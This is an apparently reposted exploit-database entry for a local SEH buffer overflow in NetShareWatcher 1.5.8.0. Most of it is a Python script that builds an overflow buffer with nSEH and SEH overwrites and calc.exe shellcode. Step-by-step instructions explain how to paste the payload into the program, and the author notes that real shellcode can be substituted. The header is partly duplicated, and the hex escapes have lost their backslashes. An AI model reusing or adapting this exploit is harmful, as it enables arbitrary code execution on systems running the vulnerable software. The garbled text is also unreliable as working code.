NetShareWatcher 1.5.8.0 Local SEH Buffer Overflow

Details
Category: Vulnerabilities
Hits: 267
# Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow
# Date: 2019-03-19
# Vendor Homepage: http://netsharewatcher.nsauditor.com
# Software Link: http://netsharewatcher.nsaudi # Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow
# Date: 2019-03-19
# Vendor Homepage: http://netsharewatcher.nsauditor.com
# Software Link: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Exploit Author: Peyman Forouzan
# Tested Version: 1.5.8.0
# Tested on: Windows XP SP2 - SP3

# 1- Run python code : NetShareWatcher.py
# 2- Open Exploit.txt and copy content to clipboard
# 3- Open NetShareWatcher
# 4- Setting --> Defaults --> Restrictions --> Add --> Custome
# 5- Paste the content of Exploit.txt into the box
# 6- Click 'Find'
# 7- Calc.exe Open ( Can be replaced with Shellcode )

#!/usr/bin/python

buffer = "x41" * 262
nseh = "xebx14x90x90" # Overwrite Next Seh With Short jmp
seh = "x90xBFxC9x74" # Overwrite Seh / pop esi pop ebx retn [OLEACC.dll]
nops = "x90" * 20

# Calc.exe payload [size 227]
buf =""
buf += "xdbxcfxb8x27x17x16x1fxd9x74x24xf4x5fx2bxc9"
buf += "xb1x33x31x47x17x83xefxfcx03x60x04xf4xeax92"
buf += "xc2x71x14x6ax13xe2x9cx8fx22x30xfaxc4x17x84"
buf += "x88x88x9bx6fxdcx38x2fx1dxc9x4fx98xa8x2fx7e"
buf += "x19x1dxf0x2cxd9x3fx8cx2ex0exe0xadxe1x43xe1"
buf += "xeax1fxabxb3xa3x54x1ex24xc7x28xa3x45x07x27"
buf += "x9bx3dx22xf7x68xf4x2dx27xc0x83x66xdfx6axcb"
buf += "x56xdexbfx0fxaaxa9xb4xe4x58x28x1dx35xa0x1b"
buf += "x61x9ax9fx94x6cxe2xd8x12x8fx91x12x61x32xa2"
buf += "xe0x18xe8x27xf5xbax7bx9fxddx3bxafx46x95x37"
buf += "x04x0cxf1x5bx9bxc1x89x67x10xe4x5dxeex62xc3"
buf += "x79xabx31x6axdbx11x97x93x3bxfdx48x36x37xef"
buf += "x9dx40x1ax65x63xc0x20xc0x63xdax2ax62x0cxeb"
buf += "xa1xedx4bxf4x63x4axa3xbex2exfax2cx67xbbxbf"
buf += "x30x98x11x83x4cx1bx90x7bxabx03xd1x7exf7x83"
buf += "x09xf2x68x66x2exa1x89xa3x4dx24x1ax2fxbcxc3"
buf += "x9axcaxc0";

payload = buffer + nseh + seh + nops + buf
try:
f=open("Exploit.txt","w")
print "[+] Creating %s bytes payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File can't be created"